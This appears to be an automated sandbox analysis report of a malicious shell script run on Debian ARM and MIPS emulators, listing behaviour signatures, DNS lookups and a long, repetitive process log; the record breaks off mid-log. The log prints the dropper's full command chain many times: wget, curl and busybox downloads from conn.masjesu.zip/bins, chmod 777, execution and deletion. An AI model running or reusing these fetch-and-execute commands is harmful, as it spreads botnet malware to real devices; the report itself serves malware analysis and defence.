Analysis Overview
SHA256
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1
Threat Level: Shows suspicious behavior
The file 1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:13
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:13
Reported
2024-10-28 02:15
Platform
debian9-armhf-20240611-en
Max time kernel
148s
Max time network
17s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
[/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:13
Reported
2024-10-28 02:15
Platform
debian9-mipsbe-20240611-en
Max time kernel
104s
Max time network
109s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
Processes
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
[/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
